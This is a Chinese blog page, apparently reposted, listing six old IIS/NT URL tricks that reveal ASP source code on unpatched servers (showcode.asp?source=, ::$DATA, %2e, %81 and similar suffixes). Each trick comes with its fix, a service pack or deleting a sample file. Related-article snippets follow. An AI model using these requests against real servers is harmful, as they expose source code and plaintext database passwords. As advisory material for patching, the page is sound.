偷看ASP原码的6种方法

最新推荐文章于 2024-09-05 10:00:22 发布
最新推荐文章于 2024-09-05 10:00:22 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: IIS ASP 文章标签: asp 数据库 server
ASP 同时被 2 个专栏收录
54 篇文章 0 订阅
订阅专栏
IIS
14 篇文章 0 订阅
订阅专栏

在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序
的源代码,它们是:

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?
source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、http://somewhere/something.asp%2e
解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、http://somewhere/something%2e%41sp
或者 http://somewhere/something%2e%asp
解决方案: 装sp4

5、http://somewhere/something.asp%81
解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;

cncco
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ASP漏洞集-ASP漏洞分析和解决方法
Execute的专栏
01-30 2210
1 在ASP程序后加个特殊符号,能看到ASP源程序  受影响的版本:  win95+pws  IIS3.0  98+pws4 不存在这个漏洞。  IIS4.0以上的版本也不存在这个漏洞。  问题描述:  这些特殊符号包括小数点,%81, ::$DATA。比如:http://someurl/somepage.asp.http:// someurl/somepage.asp%81http:// som
偷看原码的6方法
zgqtxwd的专栏
04-27 383
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
20asp源码的方法及工具
谁谁的程序技术专栏
10-30 1634
众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20asp源码的方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sql server的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网络库
偷看ASP原码的6方法 (转)
circularr9834的博客
08-12 77
偷看ASP原码的6方法 (转)[@more@]偷看ASP原码的6方法 在没有打Services Pack6补丁的NT server上,至少有6方法可以看到ASP程序的源代码,它们是: 1、http://www.so...
delphi xe 版本 示例原码下载方法.doc
03-22
6. 下载完成后,你可以直接在Delphi IDE中打开和运行这些DEMO,研究其源代码,逐步理解并应用到自己的项目中。同时,不要忘记利用版本控制系统的特性,如查看历史记录、比较不同版本之间的差异,以更全面地学习和...
上海某电器公司ASP原码
01-08
6. 学习价值:对于初学者或希望深入ASP开发的开发者,这份源码提供了实际案例,可以学习到ASP数据库的交互、页面逻辑控制、错误处理以及前端设计等多个方面。同时,通过阅读和调试代码,可以提升对ASP编程的理解和...
ASP原码加密工具介绍
11-12
### ASP原码加密工具知识点详解 #### 一、引言 在互联网技术发展的早期阶段,ASP(Active Server Pages)作为一重要的动态网页技术被广泛应用于网站开发之中。然而,由于其源代码容易被查看和复制的问题,导致了...
计算机组成原理课程设计定点原码一名乘法器的设计
07-12
本设计采用模块化设计方法,将乘法器分为多个模块,每个模块负责不同的功能。模块之间通过接口连接,形成一个完整的乘法器。 详细设计方案 ### 顶层模块设计 顶层模块是乘法器的最高层模块,负责控制整个乘法器的...
原码一位乘法器实验报告(完整)+代码
07-19
华中科技大学计算机组成原理实验报告(完整)+代码参考 ---自己写的 ...1.掌握原码一位乘法运算的基本原理 2.熟练掌握 Logisim 寄存器电路的使用 3.能在 Logisim 平台中设计实现一个 8*8 位的无符号数乘法器。
华为云征文|Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
Arya的博客,专注后端领域
09-03 1120
4核12G-100G-3M规格的Flexus X实例使用测评第3弹:Flexus云服务X实例应用,通过QT连接华为云MySQL,进行数据库的操作,数据表的增删改查
【JavaWeb】JDBC&Druid&Tomcat入门使用
lklalmq的博客
09-04 1074
预编译SQL语句并执行:预防SQL注入问题获取 PreparedStatement 对象// SQL语句中的参数值,使用?占位符替代?// 通过Connection对象获取,并传入对应的sql语句设置参数值上面的sql语句中参数使用?进行占位,在之前之前肯定要设置 这些?的值。PreparedStatement对象:setXxx(参数1,参数2):给?赋 值Xxx:数据类型;如 setInt (参数1,参数2)参数:参数1:?的位置编号,从1 开始参数2:?的值执行SQL语句。
数据同步是如何实现的?为什么需要数据同步?
最新发布
oOBubbleX的博客
09-05 853
实时数据同步,确保数据的一致性和实时更新性,将有利于企业各部门之间高效协作,从而支持企业的业务运作和决策。本文将介绍数据同步概念、数据同步的步骤、数据同步的方式,从而加深对数据同步的认识。
如何防止常见的Web应用安全漏洞!
MJH827的博客
09-04 773
Web应用的广泛使用伴随着各安全威胁。近年来,许多企业因忽视Web应用的安全性而遭受重大损失。本文将介绍几常见的Web应用安全漏洞,并提供具体的防护方案和实战演练。
分布式事务
2301_80339238的博客
09-04 962
通过前面微服务保护中,我们知道当项目拆分到不同服务后,每个服务都有自己独立的数据库,独立的tomcat,所以事务的ACID的这特性就没法满足了。例如下面我们订单服务调用了购物车服务和库存服务,如果调用库存服务出现失败,尽管可以通过抛出异常控制订单服务回滚,但是购物车服务不能感知到异常的。在分布式系统中,如果一个业务需要多个服务合作完成,并且每一个服务都有事务,多个事务必须同时成功或失败,这样的事务就是分布式事务。其中的每个服务的事务就是一个分支事务。整个业务称为全局事务。
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)
简单发点工作中用到的,或者记录下小知识点
09-03 1643
按时间 年月日条件分组,筛选数据,统计数据,聚合查询 打印出mongo的SQL语句
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值